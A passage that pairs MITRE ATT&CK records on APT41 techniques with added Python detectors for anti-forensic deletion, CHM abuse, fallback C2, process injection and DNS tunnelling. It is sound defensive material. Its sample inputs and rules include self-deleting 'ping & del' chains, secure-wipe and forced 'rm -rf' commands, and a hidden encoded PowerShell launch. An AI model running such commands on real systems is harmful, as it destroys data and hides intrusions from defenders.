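Added example, not MITRE or APT41 code; the command lines are constructed.
Bare del/rm are too common to alert on, so the checks single out what an
intruder's clean-up tends to look like: secure-wipe utilities, forced or
recursive deletion under staging directories, and the delay-then-delete-self
chain that lets a dropper remove its own file after it has exited."""
import re
import shlex
from typing import List, Optional, Tuple

WIPE_TOOLS = {"sdelete", "sdelete.exe", "sdelete64.exe", "shred", "wipe", "cipher", "cipher.exe"}
DELETE_VERBS = {"del", "erase", "rm", "unlink", "remove-item", "ri", "rd", "rmdir"}
FORCE_FLAGS = (" /f", " /q", " /s", " -rf", " -fr", " -r ", " -force", " -recurse")
STAGING_DIRS = re.compile(r"(\\|/)(temp|tmp|downloads|public|programdata|dev/shm)(\\|/)", re.I)
# "ping 127.0.0.1 -n 5 > nul & del <path>" and its timeout/sleep variants.
SELF_DELETE = re.compile(
    r"(ping\s+[\d.]+\s+-n\s+\d+|timeout\s+/t\s+\d+|sleep\s+\d+).*?(&|;|\|\|)\s*(del|erase|rm)\b",
    re.I,
)


def _names(cmdline: str) -> set:
    """Basenames of every token, so C:\\Tools\\sdelete64.exe matches sdelete64.exe."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:                  # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    return {t.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower() for t in tokens}


def classify_deletion(cmdline: str) -> Optional[str]:
    names = _names(cmdline)
    low = " " + cmdline.lower()
    if names & WIPE_TOOLS:
        return "secure-wipe tool invoked"
    if SELF_DELETE.search(low):
        return "delayed self-deletion chain"
    if names & DELETE_VERBS:
        if any(f in low for f in FORCE_FLAGS) and STAGING_DIRS.search(cmdline):
            return "forced or recursive deletion under a staging directory"
    return None


def find_cleanup(cmdlines: List[str]) -> List[Tuple[str, str]]:
    return [(c, why) for c in cmdlines if (why := classify_deletion(c))]


# Constructed sample command lines (not real data).
SAMPLE_CMDLINES = [
    r'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\bob\AppData\Local\Temp\svc.exe"',
    r"C:\Tools\sdelete64.exe -p 3 -q C:\ProgramData\stage\*",
    r"del /f /q C:\Users\bob\Downloads\loader.dll",
    r"del C:\Users\bob\Documents\notes.txt",
    "rm -rf /tmp/.x/",
    "rm -r -f /dev/shm/.cache",
]

if __name__ == "__main__":
    for cmd, why in find_cleanup(SAMPLE_CMDLINES):
        print(f"{why:55s} {cmd}")
```

The self-deletion pattern deserves the explicit rule: a running executable cannot unlink itself on Windows, so droppers hand the job to a `cmd.exe` child that waits (ping, timeout) and then deletes the path. The `ping` in that chain is not network activity worth chasing; the `del` that follows it is.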
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1070.004
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Command: Command Execution', 'File: File Deletion']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--c4c08678-eee9-475c-9a67-67b15278ec54
|
||
revoked : False
|
||
technique : Compiled HTML File
|
||
technique_description : Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)
|
||
|
||
A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
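Two practical checks follow from the description above. A CHM is a container with a fixed header, so it can be recognised by its bytes regardless of the extension it is delivered under; and because hh.exe is the only thing that renders it, the execution of an embedded payload shows up as hh.exe opening a file from a user-writable location or hh.exe spawning a script host. The following is an added example, not MITRE text or APT41 code; the header bytes and process events are constructed, and the `ProcessEvent` fields are an assumed sensor schema.

```python
"""Two checks for Compiled HTML File abuse (T1218.001).  Added example, not
MITRE or APT41 code; the bytes and events are constructed.  First, identify
a CHM by its ITSF container header regardless of the extension it carries,
so a help file delivered under another name is still recognised.  Second,
flag hh.exe opening a help file from a user-writable path, or hh.exe
spawning a script host, which is how embedded payloads typically execute."""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

CHM_MAGIC = b"ITSF"
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\downloads\\", "\\users\\public\\", "\\temp\\")


def is_chm(data: bytes) -> bool:
    """True if the buffer starts with the ITSF header every CHM container carries."""
    return len(data) >= 8 and data[:4] == CHM_MAGIC


def chm_version(data: bytes) -> Optional[int]:
    """ITSF format version (little-endian uint32 at offset 4), or None if not a CHM."""
    return struct.unpack_from("<I", data, 4)[0] if is_chm(data) else None


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hh_reason(ev: ProcessEvent) -> Optional[str]:
    image, parent = _base(ev.image), _base(ev.parent_image)
    if image == "hh.exe":
        parts = ev.cmdline.replace('"', "").split(None, 1)   # drop the hh.exe token
        target = parts[1].strip().replace("/", "\\").lower() if len(parts) > 1 else ""
        if any(m in target for m in USER_WRITABLE):
            return f"hh.exe opened a help file from a user-writable path: {target}"
    if parent == "hh.exe" and image in SCRIPT_HOSTS:
        return f"hh.exe spawned {image}"
    return None


def find_chm_abuse(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    return [(ev.pid, why) for ev in events if (why := hh_reason(ev))]


# Constructed ITSF header: magic, version 3, header length 0x60, padded to that length.
SAMPLE_CHM_HEADER = CHM_MAGIC + struct.pack("<II", 3, 0x60) + b"\x00" * (0x60 - 12)
SAMPLE_PE_HEADER = b"MZ" + b"\x90" * 62

# Constructed process events (not real data).
SAMPLE_EVENTS = [
    ProcessEvent(2001, r"C:\Windows\hh.exe",
                 r'"C:\Windows\hh.exe" C:\Users\bob\Downloads\invoice.chm',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(2002, r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA",
                 r"C:\Windows\hh.exe"),
    ProcessEvent(2003, r"C:\Windows\hh.exe",
                 r'"C:\Windows\hh.exe" C:\Program Files\Vendor\help\manual.chm',
                 r"C:\Program Files\Vendor\app.exe"),
]

if __name__ == "__main__":
    print("sample header is CHM:", is_chm(SAMPLE_CHM_HEADER), "version", chm_version(SAMPLE_CHM_HEADER))
    for pid, why in find_chm_abuse(SAMPLE_EVENTS):
        print(pid, why)
```

The third event is the control case: an installed product opening its own help file from its install directory is exactly what hh.exe is for, and it must not fire. Pair the magic check with mail-gateway or download inspection so a `.chm` renamed to something innocuous still gets the CHM policy applied.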
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1218.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['File: File Creation', 'Process: Process Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--97775c58-7cb1-46e0-9504-e60a459e44d0
|
||
revoked : False
|
||
technique : Fallback Channels
|
||
technique_description : Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
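A fallback channel hosted on a popular public site (the Steam community page in APT41's case) looks benign in isolation, so the detectable part is the transition: an implant's primary destination goes dark and, shortly afterwards, the same host opens a connection to a destination it has never used. The following is an added example over connection logs, not MITRE text or APT41 code; the flow records are constructed and the `Flow` fields are an assumed schema.

```python
"""Surface fallback-channel behaviour (T1008) in connection logs: a host whose
connections to an established destination start failing and which shortly
afterwards opens a connection to a destination it has never used before.
Added example, not MITRE or APT41 code; the flow records are constructed and
the schema is assumed.  The destination itself may be a well-known public
site, so the correlation with the failing primary channel is the signal."""
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class Flow:
    ts: float      # epoch seconds
    src: str       # internal host
    dst: str       # destination host name
    ok: bool       # connection completed and exchanged data


def detect_fallback(flows: List[Flow], min_failures: int = 3,
                    window: float = 600.0) -> List[Tuple[str, str, str, float]]:
    """Return (src, failing_primary, new_destination, ts) tuples."""
    seen = defaultdict(set)                                   # src -> dsts contacted successfully
    failures = defaultdict(lambda: defaultdict(list))         # src -> dst -> consecutive failure times
    alerts = []
    for f in sorted(flows, key=lambda x: x.ts):
        if not f.ok:
            failures[f.src][f.dst].append(f.ts)
            continue
        if f.dst not in seen[f.src]:                          # first successful contact with this dst
            for primary, times in failures[f.src].items():
                if primary != f.dst and len(times) >= min_failures and f.ts - times[-1] <= window:
                    alerts.append((f.src, primary, f.dst, f.ts))
        seen[f.src].add(f.dst)
        failures[f.src].pop(f.dst, None)                      # a success resets that dst's streak
    return alerts


# Constructed flow log (not real data).
SAMPLE_FLOWS = [
    Flow(0, "10.0.0.5", "c2.example.net", True),
    Flow(10, "10.0.0.5", "mail.example.com", True),
    Flow(60, "10.0.0.5", "c2.example.net", True),
    Flow(120, "10.0.0.5", "c2.example.net", True),
    Flow(180, "10.0.0.5", "c2.example.net", False),        # primary goes dark
    Flow(240, "10.0.0.5", "c2.example.net", False),
    Flow(300, "10.0.0.5", "c2.example.net", False),
    Flow(330, "10.0.0.5", "steamcommunity.com", True),     # never seen from this host before
    Flow(100, "10.0.0.7", "update.vendor.example", True),
    Flow(200, "10.0.0.7", "update.vendor.example", False),
    Flow(260, "10.0.0.7", "update.vendor.example", True),  # transient failure, same dst: no alert
]

if __name__ == "__main__":
    for src, primary, fallback, ts in detect_fallback(SAMPLE_FLOWS):
        print(f"{src}: {primary} failing, new destination {fallback} at t={ts}")
```

The `seen` set is per source host, so the first contact test is "new for this machine", not "new for the enterprise"; a destination the whole fleet talks to can still be a fallback for one compromised host. Feed it sinkhole or block-list outcomes as failures and the rule also catches the moment an implant reacts to a takedown.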
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1008
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'Windows', 'macOS']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--e0c1c9b9-b36e-4157-8dc1-26cd9ae25193
|
||
revoked : False
|
||
technique : Process Injection
|
||
technique_description : Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
|
||
|
||
There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.
|
||
|
||
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
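The relationship above (TIDYELF injecting WINTERLOVE into iexplore.exe) is the textbook remote-injection shape: allocate memory in the target, write the payload into it, start a thread there. Any sensor that records cross-process API calls can reconstruct that chain. The following is an added example, not MITRE text or APT41 code; the API events are constructed, the sensor schema is assumed, and the API names are the documented Win32 and NT calls that implement each step.

```python
"""Correlate OS API telemetry into the classic remote-injection chain
(T1055): allocate in a foreign process, write to it, then start execution
there.  Added example, not MITRE or APT41 code; the events are constructed
and the sensor schema is assumed.  The loader-injects-into-iexplore.exe
case is the first sample; the others show why same-process memory operations
and an allocate-and-write without an execution step must not fire."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

ALLOC = {"VirtualAllocEx", "NtAllocateVirtualMemory"}
WRITE = {"WriteProcessMemory", "NtWriteVirtualMemory"}
EXEC = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
        "QueueUserAPC", "SetThreadContext", "NtSetContextThread"}


@dataclass(frozen=True)
class ApiEvent:
    ts: float
    pid: int          # calling process
    image: str        # calling process image name
    api: str
    target_pid: int   # process the handle argument refers to


def detect_injection(events: List[ApiEvent], window: float = 5.0) -> List[Tuple[int, str, int, str]]:
    """Return (caller_pid, caller_image, target_pid, exec_api) for each completed chain."""
    state: Dict[Tuple[int, int], Dict[str, float]] = defaultdict(dict)
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.target_pid == ev.pid:
            continue                                  # local memory management is normal
        key = (ev.pid, ev.target_pid)
        st = state[key]
        if ev.api in ALLOC:
            st["alloc"] = ev.ts
        elif ev.api in WRITE and "alloc" in st and ev.ts - st["alloc"] <= window:
            st["write"] = ev.ts
        elif ev.api in EXEC and "write" in st and ev.ts - st["write"] <= window:
            hits.append((ev.pid, ev.image, ev.target_pid, ev.api))
            state.pop(key, None)
    return hits


# Constructed API telemetry (not real data).
SAMPLE_API_EVENTS = [
    ApiEvent(1.00, 3100, "loader.exe", "OpenProcess", 3188),
    ApiEvent(1.05, 3100, "loader.exe", "VirtualAllocEx", 3188),
    ApiEvent(1.10, 3100, "loader.exe", "WriteProcessMemory", 3188),
    ApiEvent(1.20, 3100, "loader.exe", "CreateRemoteThread", 3188),     # target is iexplore.exe
    ApiEvent(2.00, 500, "svchost.exe", "VirtualAllocEx", 500),           # own process: ignored
    ApiEvent(10.0, 700, "debugger.exe", "VirtualAllocEx", 710),
    ApiEvent(10.1, 700, "debugger.exe", "WriteProcessMemory", 710),      # no execution step
    ApiEvent(10.2, 700, "debugger.exe", "ReadProcessMemory", 710),
]

if __name__ == "__main__":
    for caller, image, target, api in detect_injection(SAMPLE_API_EVENTS):
        print(f"{image} (pid {caller}) injected into pid {target} via {api}")
```

Keying state on the (caller, target) pair is what separates a debugger or an AV engine touching many processes from a loader completing the full sequence against one. Variants that skip the write step (mapping a section into the target, or hijacking an existing thread) need their own state machine; this one covers the chain the page's sample describes.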
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
|
||
technique_id : T1055
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Process: Process Access', 'Process: Process Modification', 'File: File Modification', 'Process: Process Metadata', 'File: File Metadata', 'Process: OS API Execution', 'Module: Module Load']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--873faf92-be75-47e5-bf3e-b389a5bdc020
|
||
revoked : False
|
||
technique : DNS
|
||
technique_description : Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
|
||
|
||
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
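Tunnelled DNS has to carry its payload somewhere, and the places available (long, high-entropy subdomain labels on the way out; TXT, NULL or CNAME answers on the way back) are measurable. The following is an added example over a DNS query log, not MITRE text or APT41 code; the queries are constructed, the two-label "registrable domain" assumption stands in for a public-suffix list, and the thresholds are starting points to tune against a real baseline.

```python
"""Score DNS queries for tunnelling traits (T1071.004): long or high-entropy
subdomains, record types that carry arbitrary data back to the client, and
a single client generating many unique subdomains under one parent domain.
Added example, not MITRE or APT41 code; the query log is constructed and the
thresholds are starting points to tune against your own baseline."""
import base64
import hashlib
import math
from collections import defaultdict
from typing import Iterable, List, Tuple

PAYLOAD_TYPES = {"TXT", "NULL", "CNAME"}   # plenty of room for downstream data


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """(parent, subdomain).  Assumption: the registrable domain is the last two
    labels; use a public-suffix list in production."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def score_query(qname: str, qtype: str) -> int:
    _, sub = split_name(qname)
    score = 0
    if len(sub) > 50:
        score += 2
    if max((len(label) for label in sub.split(".")), default=0) > 30:
        score += 1
    if shannon_entropy(sub.replace(".", "")) > 3.8:
        score += 2
    if qtype.upper() in PAYLOAD_TYPES:
        score += 1
    return score


def detect_tunneling(queries: Iterable[Tuple[str, str, str]], per_query: int = 3,
                     unique_subs: int = 20) -> List[Tuple[str, str, str]]:
    """queries: (client_ip, qname, qtype).  Returns (client, parent_domain, reason)."""
    flagged = set()
    subs = defaultdict(set)
    for client, qname, qtype in queries:
        parent, sub = split_name(qname)
        subs[(client, parent)].add(sub)
        if score_query(qname, qtype) >= per_query:
            flagged.add((client, parent, "high-score query"))
    for (client, parent), names in subs.items():
        if len(names) >= unique_subs:
            flagged.add((client, parent, "many unique subdomains"))
    return sorted(flagged)


def _encoded_chunk(i: int) -> str:
    """Stand-in for a tunnelled data chunk: 86 base64url chars split into two labels."""
    d = base64.urlsafe_b64encode(hashlib.sha512(str(i).encode()).digest()).decode().rstrip("=")
    return f"{d[:43]}.{d[43:]}"


# Constructed query log (not real data).  The SRV record is the control case:
# long and underscore-heavy, but low entropy and a normal record type.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "mail.example.com", "A"),
    ("10.0.0.5", "_ldap._tcp.dc._msdcs.corp.example.com", "SRV"),
] + [("10.0.0.9", f"{_encoded_chunk(i)}.example.org", "TXT") for i in range(25)]

if __name__ == "__main__":
    for client, parent, reason in detect_tunneling(SAMPLE_QUERIES):
        print(client, parent, reason)
```

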